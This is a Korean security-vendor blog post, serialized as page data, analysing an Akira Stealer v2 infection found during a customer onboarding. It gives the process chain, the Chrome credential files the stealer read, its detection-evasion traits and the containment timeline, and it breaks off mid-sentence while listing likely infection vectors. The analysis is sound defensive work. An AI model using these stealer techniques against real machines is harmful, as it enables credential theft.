[{"data":1,"prerenderedAt":13639},["ShallowReactive",2],{"sc:header-data-ko":3,"sc:footer-data-ko":489,"post-ko--posts-2025-06-16-quiet-breach-1445fe6971adcc":519,"authors_data":13054,"content-ko-list-7b291c2dd91a4":13408,"authors_data:Pascal Asch":13636},{"lang":4,"home":5,"navigation":17,"meta":479,"contact":485},"de",{"name":6,"folderSwitch":7,"imgLight":10,"img":11,"languages":12},"home",[8,9],"authors","blog","/logos/gk-Logo-sw.svg","/logos/gk-Logo-rgb.svg",{"ko":13},{"title":14,"url":15,"alt":16},"홈","/ko","glueckkanja Logo",[18,127,231,316,395,402],{"name":19,"languages":20,"children":24},"workplace",{"ko":21},{"title":22,"description":23},"Workplace","스마트하고 안전하며 유연한 워크스페이스를 위한 Microsoft 365 기반 솔루션으로, 최신 기술과 ID 서비스를 매끄럽게 통합합니다.",[25,55,91],{"name":26,"languages":27,"children":30},"portfolio",{"ko":28},{"title":29},"Portfolio",[31,37,43,49],{"name":32,"languages":33},"managed-intune",{"ko":34},{"title":35,"url":36},"Managed Intune","/ko/entra-intune/managed-intune",{"name":38,"languages":39},"managed-entra",{"ko":40},{"title":41,"url":42},"Managed Entra","/ko/entra-intune/managed-entra",{"name":44,"languages":45},"managed-workplace",{"ko":46},{"title":47,"url":48},"Managed Workplace","/ko/workplace/managed-workplace",{"name":50,"languages":51},"consulting-services",{"ko":52},{"title":53,"url":54},"Consulting Services","/ko/workplace/consulting-services",{"name":56,"languages":57,"children":60},"microsoft-365-endpoint",{"ko":58},{"title":59},"Microsoft 365 Endpoint",[61,67,73,79,85],{"name":62,"languages":63},"microsoft-entra-suite",{"ko":64},{"title":65,"url":66},"Microsoft Entra Suite","/ko/workplace/microsoft-entra-suite",{"name":68,"languages":69},"microsoft-intune",{"ko":70},{"title":71,"url":72},"Microsoft Intune","/ko/workplace/microsoft-intune",{"name":74,"languages":75},"microsoft-windows",{"ko":76},{"title":77,"url":78},"Microsoft Windows","/ko/workplace/microsoft-windows",{"name":80,"languages":81},"windows-365-cloud-pc",{"ko":82},{"title":83,"url":84},"Windows 365 Cloud PC","/ko/workplace/windows365-cloud-pc",{"name":86,"languages":87},"cloud-workplace-foundation",{"ko":88},{"title":89,"url":90},"Cloud Workplace Foundation","/ko/workplace/cloud-workplace-foundation",{"name":92,"languages":93,"children":96},"microsoft-365-collaboration",{"ko":94},{"title":95},"Microsoft 365 Collaboration",[97,103,109,115,121],{"name":98,"languages":99},"microsoft-copilot",{"ko":100},{"title":101,"url":102},"Microsoft 365 Copilot","/ko/workplace/microsoft-365-copilot",{"name":104,"languages":105},"microsoft-teams",{"ko":106},{"title":107,"url":108},"Teams","/ko/workplace/microsoft-teams",{"name":110,"languages":111},"sharepoint-powerplatform",{"ko":112},{"title":113,"url":114},"SharePoint & Power Platform","/ko/workplace/sharepoint-power-platform",{"name":116,"languages":117},"exchange-online",{"ko":118},{"title":119,"url":120},"Exchange Online","/ko/workplace/exchange-online",{"name":122,"languages":123},"information-protection-compliance",{"ko":124},{"title":125,"url":126},"Information Protection & Compliance","/ko/workplace/information-protection-compliance",{"name":128,"languages":129,"children":133},"azure",{"ko":130},{"title":131,"description":132},"Azure","Azure로 성장을 가속하세요: IaaS와 PaaS를 통해 클라우드 비용을 절감하고 효율을 높이며 혁신을 추진합니다.",[134,151,181],{"name":135,"languages":136,"children":138},"azure-portfolio",{"ko":137},{"title":29},[139,145],{"name":140,"languages":141},"azure-managed-services",{"ko":142},{"title":143,"url":144},"Azure Managed Services","/ko/azure/azure-managed-services",{"name":146,"languages":147},"azure-consulting",{"ko":148},{"title":149,"url":150},"Azure Consulting","/ko/azure/azure-consulting",{"name":152,"languages":153,"children":156},"azure-scenarios",{"ko":154},{"title":155},"시나리오",[157,163,169,175],{"name":158,"languages":159},"plan-your-cloud",{"ko":160},{"title":161,"url":162},"클라우드 계획","/ko/azure/plan-your-cloud",{"name":164,"languages":165},"migrate-to-the-cloud",{"ko":166},{"title":167,"url":168},"클라우드로 마이그레이션","/ko/azure/migrate-to-the-cloud",{"name":170,"languages":171},"innovate-your-business",{"ko":172},{"title":173,"url":174},"비즈니스 혁신","/ko/azure/innovate-your-business",{"name":176,"languages":177},"vmware-exit",{"ko":178},{"title":179,"url":180},"VMware 전략 재검토","/ko/azure/vmware-exit",{"name":182,"languages":183,"children":186},"azure-practices",{"ko":184},{"title":185},"Practices",[187,193,199,202,208,213,219,225],{"name":188,"languages":189},"azure-foundation",{"ko":190},{"title":191,"url":192},"Azure Foundation","/ko/azure/azure-foundation",{"name":194,"languages":195},"azure-ai-foundation",{"ko":196},{"title":197,"url":198},"Azure AI Foundation","/ko/azure/azure-ai-foundation",{"name":86,"languages":200},{"ko":201},{"title":89,"url":90},{"name":203,"languages":204},"azure-data-foundation",{"ko":205},{"title":206,"url":207},"Azure Data Foundation","/ko/azure/azure-data-foundation",{"name":188,"languages":209},{"ko":210},{"title":211,"url":212},"Azure Container Foundation","/ko/azure/azure-container-foundation",{"name":214,"languages":215},"dark-tenant",{"ko":216},{"title":217,"url":218},"Managed Dark Tenant","/ko/azure/managed-dark-tenant",{"name":220,"languages":221},"azure-cloud-adoption-framework",{"ko":222},{"title":223,"url":224},"Cloud Adoption Framework","/ko/azure/cloud-adoption-framework",{"name":226,"languages":227},"azure-cloud-competence-center",{"ko":228},{"title":229,"url":230},"Cloud Competence Center","/ko/azure/cloud-competence-center",{"name":232,"languages":233,"children":242},"security",{"ko":234},{"title":235,"description":236,"emergency":237},"보안","수상 경력의 24/7 매니지드 서비스, 인시던트 대응, 최신 인프라 보호로 클라우드를 지킵니다.",{"text":238,"href":239,"skin":240,"icon":241},"공격을 받고 있나요?","/ko/security/are-you-under-attack","primary","emergency",[243,268,289],{"name":244,"children":245},"security-security-consulting",[246,252,256,262],{"name":247,"languages":248},"managed-red-tenant",{"ko":249},{"title":250,"url":251},"Managed Red Tenant","/ko/security/managed-red-tenant",{"name":214,"languages":253},{"ko":254},{"title":255,"url":218},"Dark Tenant",{"name":257,"languages":258},"sentinel-data-lake",{"ko":259},{"title":260,"url":261},"Sentinel Data Lake","/ko/security/sentinel-data-lake",{"name":263,"languages":264},"security-consulting",{"ko":265},{"title":266,"url":267},"Security Consulting","/ko/security/security-consulting",{"name":269,"children":270},"security-cloud-security-operations-center",[271,277,283],{"name":272,"languages":273},"cloud-security-operations-center",{"ko":274},{"title":275,"url":276},"Cloud Security Operations Center","/ko/security/cloud-security-operations-center",{"name":278,"languages":279},"global-secure-access",{"ko":280},{"title":281,"url":282},"Global Secure Access","/ko/security/global-secure-access",{"name":284,"languages":285},"my-work-id",{"ko":286},{"title":287,"url":288},"MyWorkID","/ko/security/my-work-id",{"name":290,"children":291},"security-preventive-services",[292,298,304,310],{"name":293,"languages":294},"preventive-services",{"ko":295},{"title":296,"url":297},"Preventive Services","/ko/security/preventive-services",{"name":299,"languages":300},"data-security-services",{"ko":301},{"title":302,"url":303},"Data Security Service","/ko/security/data-security-service",{"name":305,"languages":306},"security-copilot-agents",{"ko":307},{"title":308,"url":309},"Security Copilot Agents","/ko/security/security-copilot-agents",{"name":311,"languages":312},"nis2",{"ko":313},{"title":314,"url":315},"NIS2 이행","/ko/security/red-dark-tenant-nis2",{"name":317,"languages":318,"children":322},"products",{"ko":319},{"title":320,"description":321},"제품","완전히 안전한 100% 클라우드 네이티브 Microsoft 환경을 위한 혁신적인 제품군으로, 협업과 네트워크 인증, 소프트웨어 관리를 강화합니다.",[323,360],{"name":324,"products":325,"children":326},"lorem ipsum 1",true,[327,336,344,352],{"name":328,"img":329,"target":330,"languages":331},"realmjoin","products/realmjoin/realmjoin-nav-logo.svg","_blank",{"ko":332},{"title":333,"url":334,"subtitle":335},"RealmJoin","https://www.realmjoin.com","클라우드 기반 소프트웨어 배포",{"name":337,"img":338,"target":330,"languages":339},"scepman","products/scepman/scepman-nav-logo.svg",{"ko":340},{"title":341,"url":342,"subtitle":343},"SCEPman","https://www.scepman.com","클라우드에서 인증서 배포",{"name":345,"img":346,"target":330,"languages":347},"konnekt","products/konnekt/konnekt-nav-logo.svg",{"ko":348},{"title":349,"url":350,"subtitle":351},"KONNEKT","https://www.konnekt.io","Office 365 데이터를 로컬에서 활용",{"name":353,"img":354,"target":330,"languages":355},"realmigrator","products/realmigrator/realmigrator-nav-logo.svg",{"ko":356},{"title":357,"url":358,"subtitle":359},"RealMigrator","https://www.realmigrator.com","서버 간 데이터 마이그레이션",{"name":361,"products":325,"children":362},"lorem ipsum 2",[363,371,379,387],{"name":364,"img":365,"target":330,"languages":366},"terraprovider","products/terraprovider/terraprovider-nav-logo.svg",{"ko":367},{"title":368,"url":369,"subtitle":370},"TerraProvider","https://www.terraprovider.com","Microsoft 365용 Terraform Provider",{"name":372,"img":373,"target":330,"languages":374},"radiusaas","products/radius/radius-nav-logo.svg",{"ko":375},{"title":376,"url":377,"subtitle":378},"RADIUSaaS","https://www.radius-as-a-service.com","네트워크 인증",{"name":380,"img":381,"target":330,"languages":382},"unifiedcontacts","products/unified-contacts/unifiedcontact-nav-logo.svg",{"ko":383},{"title":384,"url":385,"subtitle":386},"Unified Contacts","https://www.unified-contacts.com","Microsoft Teams에서 연락처 찾기",{"name":388,"img":389,"target":330,"languages":390},"autopilotmonitor","products/autopilot-monitor/AutopilotMonitor-nav-logo.svg",{"ko":391},{"title":392,"url":393,"subtitle":394},"Autopilot Monitor","https://www.autopilotmonitor.com","실시간 Windows Autopilot 모니터링",{"name":396,"languages":397},"casestudies",{"ko":398},{"title":399,"url":400,"description":401},"고객 사례","/ko/casestudies","클라우드의 선구자: Blueprint 기반 접근 방식과 Infrastructure-as-Code 전문성을 갖춘, 포괄적인 클라우드 솔루션을 위한 최고의 Microsoft 파트너입니다.",{"name":403,"languages":404,"children":407},"company",{"ko":405},{"title":406,"description":401},"회사",[408,438,462],{"name":409,"languages":410,"children":413},"company-about-us",{"ko":411},{"title":412},"회사 소개",[414,420,426,432],{"name":415,"languages":416},"company-facts-figures",{"ko":417},{"title":418,"url":419},"주요 현황","/ko/company/facts-and-figures",{"name":421,"languages":422},"company-contact",{"ko":423},{"title":424,"url":425},"연락처 및 위치","/ko/company/contact-and-locations",{"name":427,"languages":428},"switzerland",{"ko":429},{"title":430,"url":431}," glueckkanja 스위스","/ko/company/switzerland",{"name":433,"languages":434},"austria",{"ko":435},{"title":436,"url":437},"glueckkanja 오스트리아","/ko/company/austria",{"name":439,"languages":440,"children":443},"company-career",{"ko":441},{"title":442},"채용",[444,450,456],{"name":445,"languages":446},"company-career-overview",{"ko":447},{"title":448,"url":449},"채용 안내","/ko/career",{"name":451,"languages":452},"company-young-professionals",{"ko":453},{"title":454,"url":455},"Young Professionals","/ko/young-professionals",{"name":457,"languages":458},"company-jobs",{"ko":459},{"title":460,"url":461},"채용 공고","/ko/job-offers",{"name":463,"languages":464,"children":467},"company-latest",{"ko":465},{"title":466},"최신 소식",[468,474],{"name":469,"languages":470},"company-blog",{"ko":471},{"title":472,"url":473},"블로그","/ko/blog",{"name":469,"languages":475},{"ko":476},{"title":477,"url":478},"이벤트","/ko/events",[480],{"name":481,"languages":482},"career-meta",{"ko":483},{"title":442,"url":449,"active":484},false,{"languages":486},{"ko":487},{"title":488,"url":425,"active":484},"문의",{"data":490},{"bgColor":491,"number":492,"mail":493,"brandLogos":494,"logos":495,"links":499,"linksKo":509},"var(--color-gk-mid-blue)","+49 69 4005520","info@glueckkanja.com",null,[496],{"img":10,"alt":16,"url":497,"class":498},"index.html","max-w-19rem",[500,503,506],{"title":501,"url":502},"Datenschutz","/de/privacy",{"title":504,"url":505},"Impressum","/de/imprint",{"title":507,"url":508},"No Cookies","/de/cookies",[510,513,516],{"title":511,"url":512},"개인정보 처리방침","/ko/privacy",{"title":514,"url":515},"법적 고지","/ko/imprint",{"title":517,"url":518},"쿠키 없음","/ko/cookies",{"id":520,"title":521,"author":522,"body":524,"cta":494,"description":534,"eventid":494,"extension":12926,"hideInRecent":484,"layout":12927,"meta":12928,"moment":12932,"navigation":325,"path":13045,"seo":13046,"stem":13047,"tags":13048,"webcast":484,"__hash__":13053},"content_ko/posts/2025-06-16-quiet-breach.md","Akira Stealer 들여다보기: 모듈형 스틸러에 대한 완전한 기술 분석",[523],"Pascal Asch",{"type":525,"value":526,"toc":12781},"minimal",[527,531,535,543,546,565,568,586,596,599,602,626,634,644,651,654,657,672,679,682,685,699,703,705,712,717,720,723,735,744,751,754,760,763,767,769,775,781,784,788,790,793,819,825,831,835,837,840,844,846,849,851,857,860,865,868,879,882,885,906,909,916,923,925,931,934,940,943,978,981,990,996,1005,1008,1020,1023,1030,1032,1040,1050,1082,1088,1093,1114,1120,1123,1126,1131,1140,1147,1149,1152,1164,1167,1201,1207,1233,1242,1245,1250,1258,1260,1269,1275,1293,1296,1301,1335,1339,1342,1345,1351,1365,1371,1377,1379,1384,1388,1390,1470,1473,1477,1479,1484,1490,1495,1504,1509,1514,1525,1528,1533,1542,1548,1551,1555,1557,1569,1574,1592,1598,1607,1618,1625,1630,1634,1636,1642,1668,1671,1685,1688,1697,1700,1704,1706,1713,1716,1719,1732,1742,1749,1770,1773,1779,1783,1785,1788,1797,1809,1834,1841,1847,1850,1857,1860,1873,1880,1882,1889,1893,1895,1901,1999,2006,2014,2016,2019,2042,2045,2075,2078,2122,2125,2134,2137,2155,2161,2164,2173,2176,2188,2195,2199,2201,2208,2230,2237,2271,2274,2289,2296,2301,2312,2315,2319,2321,2324,2339,2346,2357,2366,2403,2410,2413,2417,2419,2425,2430,2470,2473,2488,2491,2500,2506,2509,2513,2515,2518,2527,2530,2576,2583,2587,2589,2594,2599,2627,2634,2636,2652,2656,2658,2661,2701,2707,2713,2717,2719,2737,2747,2754,2791,2798,2844,2853,2857,2859,2862,2890,2900,2907,2909,2914,2918,2920,2926,2930,2932,2939,2965,2972,3232,3235,3240,3243,3276,3282,3286,3288,3291,3295,3297,3300,3402,3405,3409,3411,3414,3576,3579,3602,3606,3608,3616,3858,3861,3889,3893,3895,3928,3934,3937,3969,3973,3975,3981,3986,3989,4007,4010,4018,4023,4026,4106,4114,4117,4123,4131,4135,4137,4143,4148,4151,4168,4175,4180,4187,4249,4261,4266,4272,4299,4302,4340,4343,4348,4351,4365,4369,4371,4376,4398,4405,4411,4413,4417,4419,4425,4429,4431,4435,4437,4442,4469,4475,4479,4481,4487,4504,4528,4535,4539,4541,4544,4553,4567,4570,4574,4576,4589,4592,4601,4607,4614,4616,4620,4622,4632,4636,4638,4643,4657,4671,4675,4677,4760,4763,4770,4772,4777,4835,4842,4968,4971,5116,5120,5122,5125,5179,5182,5186,5188,5194,5247,5250,5254,5256,5259,5311,5314,5318,5320,5327,5379,5382,5386,5388,5395,5436,5439,5443,5445,5452,5534,5537,5541,5543,5546,5593,5596,5601,5604,5607,5611,5613,5618,5624,5629,5635,5640,5646,5651,5657,5662,6063,6067,6069,6109,6113,6115,6123,6127,6129,6139,6144,6169,6190,6195,6281,6285,6287,6381,6384,6390,6397,6399,6402,6457,6514,6521,6523,6526,6561,6596,6603,6605,6608,6641,6678,6685,6687,6690,6759,6805,6812,6814,6817,6845,6874,6881,6883,6886,6914,6934,6944,6946,6949,6974,7013,7017,7019,7052,7056,7058,7061,7064,7067,7070,7073,7078,7103,7108,7138,7145,7154,7176,7385,7389,7391,7398,7496,7499,7503,7505,7512,7605,7615,7621,7624,7629,7635,7663,7668,7698,7751,7770,7773,7778,7826,7830,7832,7835,7839,7841,7847,7967,7987,7991,7993,7998,8072,8093,8097,8099,8102,8105,8108,8111,8210,8218,8222,8224,8229,8264,8286,8290,8292,8295,8298,8306,8309,8397,8411,8415,8417,8420,8423,8516,8522,8524,8530,8534,8536,8539,8604,8621,8624,8658,8661,8665,8667,8672,8685,8730,8756,8761,8774,8850,8905,8909,8911,8914,8920,8960,8970,8976,8986,8990,8992,8995,9024,9050,9056,9060,9062,9069,9076,9078,9084,9139,9166,9170,9172,9175,9240,9247,9286,9290,9292,9298,9313,9316,9351,9355,9357,9364,9408,9422,9428,9435,9437,9440,9444,9446,9449,9483,9486,9511,9515,9517,9522,9525,9549,9573,9577,9579,9582,9606,9610,9612,9615,9635,9639,9641,9644,9651,9764,9769,9814,9818,9820,9827,9861,9915,9920,9923,9927,9929,9932,9936,9938,9941,9947,9951,9953,9956,10011,10026,10030,10032,10043,10112,10121,10126,10129,10173,10175,10179,10181,10184,10276,10281,10410,10414,10416,10419,10424,10497,10515,10520,10540,10548,10553,10559,10574,10591,10597,10655,10676,10681,10698,10703,10746,10760,10763,10767,10769,10774,10778,10780,10787,10793,10797,10799,10906,10913,10917,10919,10926,10931,11012,11019,11026,11030,11032,11035,11064,11071,11075,11077,11081,11083,11090,11093,11096,11099,11243,11246,11250,11252,11255,11259,11261,11264,11300,11306,11310,11312,11315,11341,11344,11350,11354,11356,11361,11378,11384,11388,11390,11394,11396,11412,11436,11443,11459,11475,11478,11481,11483,11493,11497,11499,11928,11931,11935,11937,11943,11946,11949,11956,11959,11970,11976,11979,11984,11988,11990,11993,11998,12012,12016,12018,12315,12318,12322,12324,12436,12439,12443,12445,12499,12502,12506,12508,12671,12674,12678,12680,12721,12724,12728,12730,12733,12736,12739,12742,12745,12748,12753,12757,12759,12762,12765,12768,12771,12774,12777],[528,529,530],"h1",{"id":530},"프롤로그",[532,533,534],"p",{},"{: .h3-font-size}",[532,536,537,538,542],{},"수많은 현대적 공격이 그렇듯, 이 공격도 조용히 시작되었습니다. 신뢰도가 낮은 Defender 경고 하나가 ",[539,540,541],"strong",{},"\"의심스러운 탐색 활동 시퀀스(Suspicious sequence of exploration activities)\""," 라는 이름으로, 신규 고객을 우리 glueckkanja 사이버 보안 운영 센터(CSOC)로 온보딩하는 단계에서 표면화되었습니다.",[532,544,545],{},"시그니처 탐지도 없었습니다. 멀웨어 분류도 없었습니다. 실시간 보호 대응도 없었습니다. 오직 Microsoft 365 Defender 안에서 소음에 묻힌 단 하나의 행위 상관관계뿐이었지만, 그것은 분명히 잘못된 무언가였습니다.",[532,547,548,549,553,554,557,558,561,562],{},"경고를 분류하던 중 한 가지 특정 동작이 제 주의를 끌었습니다. ",[550,551,552],"code",{},"python.exe","가 Chromium 프로필 내부의 ",[550,555,556],{},"Login Data","와 ",[550,559,560],{},"Web Data"," 파일에 모두 접근했던 것입니다. Microsoft Defender는 이를 즉시 심각도 높은 인시던트로 격상시켰습니다. ",[539,563,564],{},"\"암호 및 기타 민감한 웹 브라우저 정보의 도난 가능성(Possible theft of passwords and other sensitive web browser information).\"",[532,566,567],{},"이것은 오탐이 아니었습니다. 더 깊은 무언가의 빙산의 일각이었습니다.",[532,569,570,571,574,575,578,579,581,582,585],{},"텔레메트리를 역추적하면서, 저는 시작 프로그램 위치에 있는 평범한 바이너리 ",[550,572,573],{},"Updater.exe","를 발견했습니다. 이 바이너리는 NodeJS 기반 래퍼(",[550,576,577],{},"main.exe",")를 생성했고, 그 래퍼는 ",[550,580,552],{},"를 통해 ",[550,583,584],{},"astor.py","라는 스크립트를 실행하는 명령줄을 실행했습니다.",[587,588,594],"pre",{"className":589,"code":591,"language":592,"meta":593},[590],"language-text","Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n","text","",[550,595,591],{"__ignoreMap":593},[532,597,598],{},"이 스크립트는 단순히 자격 증명을 긁어모으는 데 그치지 않았습니다. 레지스트리 조회, 시스템 지문 채취, 권한 인식 열거 등 침해 후 정찰 단계를 순차적으로 실행했습니다. 탐지를 회피하기 위해 네이티브 시스템 동작을 모방하며 외과 수술 같은 정밀함으로 작동했습니다. 그리고 거의 성공할 뻔했습니다.",[532,600,601],{},"최초 대응 시점 기준으로:",[603,604,605,615,623],"ul",{},[606,607,608,610,611,614],"li",{},[550,609,573],{},"는 VirusTotal의 ",[539,612,613],{},"69개 엔진 중 단 1개","에서만 탐지되었습니다.",[606,616,617,619,620,622],{},[550,618,577],{},", ",[550,621,584],{}," 및 관련된 모든 구성 요소는 사실상 VirusTotal에서 탐지되지 않았습니다.",[606,624,625],{},"서명된 파일은 없었습니다. 상승된 권한 컨텍스트도 없었습니다. 그저 \"평범한\" 프로세스들이 매우 평범하지 않은 일을 하고 있었을 뿐입니다.",[532,627,628,630,631,633],{},[550,629,573],{},"는 자격 증명을 건드리지 않았습니다. 그 작업은 ",[550,632,584],{},", 즉 메모리 상주 Python 페이로드의 몫이었습니다. 이 파일은 설계상 거의 흔적을 남기지 않았습니다.",[532,635,636,639,640,643],{},[539,637,638],{},"21분"," 이내에 해당 시스템은 네트워크에서 격리되었습니다. ",[539,641,642],{},"70분"," 이내에는 내부 ID, SaaS 플랫폼, 서드파티 서비스 등 영향을 받은 모든 범위에서 자격 증명이 교체되었습니다.",[532,645,646,647,650],{},"하지만 진정한 전환점은 우리가 Python 페이로드를 추출하고 완전히 복호화했을 때 찾아왔습니다. 우리가 발견한 것은 일반적인 스틸러가 아니라, Telegram을 통해 상업적으로 배포되는 멀웨어 계열인 ",[539,648,649],{},"Akira Stealer v2","의 맞춤형 배포판이었습니다.",[532,652,653],{},"우리 자체 위협 인텔리전스와 리버스 엔지니어링 역량 덕분에, 우리는 멀웨어의 전체 기능을 재구성하고, 삽입된 모든 지표를 추출하며, 그 스테이징, 유출, 자격 증명 표적 로직을 상세히 이해할 수 있었습니다.",[532,655,656],{},"더 중요한 것은, 우리가 기술적 귀속에서 멈추지 않았다는 점입니다. 우리는 한 걸음 더 나아갔습니다.",[532,658,659,660,663,664,667,668,671],{},"우리는 고객에게 ",[539,661,662],{},"유출된 자격 증명의 완전한 데이터셋","을 제공할 수 있었습니다. 클라우드 서비스, CRM 시스템, 내부 플랫폼, 심지어 핵심 직원들이 사용하는 개인 도구의 접근 자격 증명을 포함해 ",[539,665,666],{},"100개가 넘는 고유한 사용자명-암호 조합","이 있었습니다. 이 탈취는 ",[539,669,670],{},"수개월간"," 지속되어 왔으며, 우리는 그 전부를 설명할 수 있었습니다.",[532,673,674,675,678],{},"이 사례에서 얻은 통찰을 활용해, 우리는 영향을 받은 시스템을 스캔하고, 자격 증명 접근 패턴을 재구성하며, 상세한 포렌식 보고서를 생성하는 ",[539,676,677],{},"감염 후 분석 도구","를 구축했습니다. 정확히 무엇이, 언제, 어디에서 탈취되었는지 매핑합니다.",[532,680,681],{},"이 보고서 끝부분에서 그 스캐너를 잠깐 소개하겠습니다.",[532,683,684],{},"이것은 단순한 인시던트 그 이상이기 때문입니다.\n이것이 우리가 조사하는 방식입니다. 이것이 우리가 보호하는 방식입니다.",[532,686,687,695,698],{},[539,688,689,694],{},[690,691,693],"a",{"href":692},"/ko/security/cloud-security-operations-center/","glueckkanja CSOC","에 오신 것을 환영합니다.",[696,697],"br",{},"\n이것이 우리가 일하는 방식입니다. 침해는 기다려 주지 않기 때문입니다.",[528,700,702],{"id":701},"_1-초기-이벤트-및-분류-요약","1. 초기 이벤트 및 분류 요약",[532,704,534],{},[532,706,707,708,711],{},"2025년 3월 31일, Microsoft Defender for Endpoint는 Windows 10 64비트 엔드포인트에서 ",[539,709,710],{},"\"의심스러운 탐색 활동 시퀀스\""," 로 표시된 경고를 생성했습니다. 저는 이 신호를 바탕으로 분류를 시작했고, 프로세스 트리, 시스템 타임라인, 그리고 Defender가 상관 분석한 증거를 사용해 영향을 받은 시스템을 검토했습니다.",[713,714,716],"h2",{"id":715},"_11-타임라인-기반-분류","1.1 타임라인 기반 분류",[532,718,719],{},"{: .h4-font-size}",[532,721,722],{},"이 경고는 추가 조사가 필요한 프로세스 시퀀스를 가리켰습니다. 초기 검토 중, 저는 로컬 사용자 프로필 내의 Chrome 브라우저 데이터에 대해 다음과 같은 접근 패턴을 관찰했습니다:",[603,724,725,730],{},[606,726,727],{},[550,728,729],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[606,731,732],{},[550,733,734],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[532,736,737,738,740,741,743],{},"이 접근은 ",[550,739,573],{},"라는 프로세스에 의해 시작되었습니다. Microsoft Defender는 휴리스틱이나 행위 분석을 근거로 이 바이너리를 플래그하지 않았지만, 저는 VirusTotal에서 ",[550,742,573],{},"에 대한 탐지를 발견했습니다. 당시 단 하나의 엔진에서 플래그된 상태였습니다.",[532,745,746],{},[747,748],"img",{"alt":749,"src":750},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[532,752,753],{},"관찰된 전체 실행 체인은 다음과 같았습니다:",[587,755,758],{"className":756,"code":757,"language":592,"meta":593},[590],"winlogon.exe\n└── userinit.exe\n    └── explorer.exe\n        └── Updater.exe\n            └── main.exe\n                └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n                    └── python.exe Crypto\\Util\\astor.py\n",[550,759,757],{"__ignoreMap":593},[532,761,762],{},"이 단계에서는 관련 파일에 대한 더 깊은 정적 또는 동적 분석은 수행되지 않았습니다. 제 초점은 상위 수준의 동작과 맥락을 이해하는 데 있었습니다. 프로세스 이름과 파일 경로는 평범했고, 연쇄된 Python 실행 외에는 의심스러운 명령줄 인수가 없었습니다.",[713,764,766],{"id":765},"_12-초기-대응","1.2 초기 대응",[532,768,719],{},[532,770,771,772,774],{},"최초 경고로부터 ",[539,773,638],{}," 이내에, 저는 Defender for Endpoint의 격리 기능을 사용해 호스트 격리를 시작했습니다. 목표는 추가 확산이나 유출 가능성을 차단하는 것이었습니다.",[532,776,777,778,780],{},"첫 ",[539,779,642],{}," 이내에, 우리는 영향을 받은 호스트에서 사용된 것으로 알려진 자격 증명을 교체하는 작업을 진행했습니다. 내부 시스템, SaaS 플랫폼, 핵심 서드파티 벤더를 포함했습니다.",[532,782,783],{},"리버스 엔지니어링 과정은 최초 봉쇄 이후 시작되었습니다. 다음 섹션에서는 이 침해를 조사하기 위해 뒤이어 진행한 기술적 심층 분석을 문서화합니다.",[713,785,787],{"id":786},"_13-대응-요약-빠르고-투명하며-영향-중심의","1.3 대응 요약 – 빠르고, 투명하며, 영향 중심의",[532,789,719],{},[532,791,792],{},"우리의 대응은 속도, 전문성, 운영적 탁월함을 결합했으며, 입증된 워크플로와 고객에 대한 완전한 가시성으로 뒷받침되었습니다.",[603,794,795,801,807,813],{},[606,796,797,800],{},[539,798,799],{},"탐지에서 완전 봉쇄까지 90분 미만","\nDefender 경고, 네트워크 격리, 안티바이러스 스캔, 자격 증명 폐기가 신속하게 그리고 협응하여 실행되었습니다.",[606,802,803,806],{},[539,804,805],{},"48시간 이내 심층 포렌식 대응","\n전체 디스크 및 메모리 분석, 브라우저 아티팩트 검토, 자격 증명 덤핑 탐지, 공격자 활동의 행위적 재구성을 포함합니다.",[606,808,809,812],{},[539,810,811],{},"안전한 데이터 복구 및 증거 처리","\n쿠키, 암호, 토큰, 브라우저 프로필을 포함한 탈취된 데이터를 복구하고, 포렌식적으로 보관한 뒤, 고객에게 안전하게 인계했습니다.",[606,814,815,818],{},[539,816,817],{},"엔드투엔드 가시성 및 커뮤니케이션","\n최초 경고부터 조치 및 디브리핑까지 모든 단계가 완전히 문서화되었고, 실시간으로 공유되었으며, 구조화된 CSIRT 인계 문서로 요약되었습니다.",[820,821,822],"blockquote",{},[532,823,824],{},"이 인시던트는 glueckkanja CSOC가 단지 멀웨어를 멈추는 데 그치지 않고, 그 영향을 해체하고, 고객에게 통제권을 되돌려 주며, 모든 인시던트를 인사이트로 바꾸는 방식을 잘 보여줍니다.",[826,827],"div",{"className":828},[829,830],"space-top-1","space-bottom-1",[528,832,834],{"id":833},"_2-멀웨어-아키텍처-및-실행-체인-개요","2. 멀웨어 아키텍처 및 실행 체인 개요",[532,836,534],{},[532,838,839],{},"영향을 받은 엔드포인트에서 관찰된 멀웨어는 배포, 디코딩, 실행, 데이터 유출로 책임이 명확히 분리된 구조화된 다단계 아키텍처를 따랐습니다.",[713,841,843],{"id":842},"_21-실행-체인-개요","2.1 실행 체인 개요",[532,845,719],{},[532,847,848],{},"관찰된 실행 흐름은 다음과 같았습니다:",[532,850,573],{},[587,852,855],{"className":853,"code":854,"language":592},[590],"​   └── main.exe\n​       └── cmd.exe\n​           └── python.exe astor.py\n",[550,856,854],{"__ignoreMap":593},[532,858,859],{},"체인의 각 구성 요소는 은닉성, 모듈성, 회피에 기여했습니다. 이 아키텍처는 정상 런타임과 표준 OS 인터프리터를 활용해 탐지 메커니즘을 우회했습니다.",[861,862,864],"h3",{"id":863},"_211-출처-불확실성-누락된-초기-침투-벡터","2.1.1 출처 불확실성: 누락된 초기 침투 벡터",[532,866,867],{},"{: .font-size-4}",[532,869,870,871,874,875,878],{},"침해 후 환경에 대한 광범위한 분석에도 불구하고, 초기 접근 벡터는 확정적으로 규명할 수 없었습니다. 이 불확실성은 주로 멀웨어가 ",[539,872,873],{},"탐지 이전 약 6개월 동안"," 활동을 지속했으며, 이는 ",[539,876,877],{},"Microsoft Defender for Endpoint가 적용하는 로그 보존 기간","을 초과했다는 사실에서 기인합니다.",[532,880,881],{},"그 결과, 최초 감염 시점의 텔레메트리나 포렌식 아티팩트를 확보할 수 없었습니다. 전달(delivery) 단계와 관련된 최초 프로세스 생성 이벤트, 파일 드롭, 명령줄 항목은 Defender의 타임라인이나 관련 센서에서 복구할 수 없었습니다.",[532,883,884],{},"맥락 지표와 OSINT 소스에 근거할 때, 가능성 있는 감염 벡터는 다음을 포함할 수 있습니다:",[603,886,887,893,900],{},[606,888,889,890],{},"크랙 또는 개조된 게임 소프트웨어의 ",[539,891,892],{},"트로이목마화된 설치 프로그램",[606,894,895,896,899],{},"포럼과 서드파티 사이트를 통해 배포되는 ",[539,897,898],{},"가짜 유틸리티"," 또는 \"성능 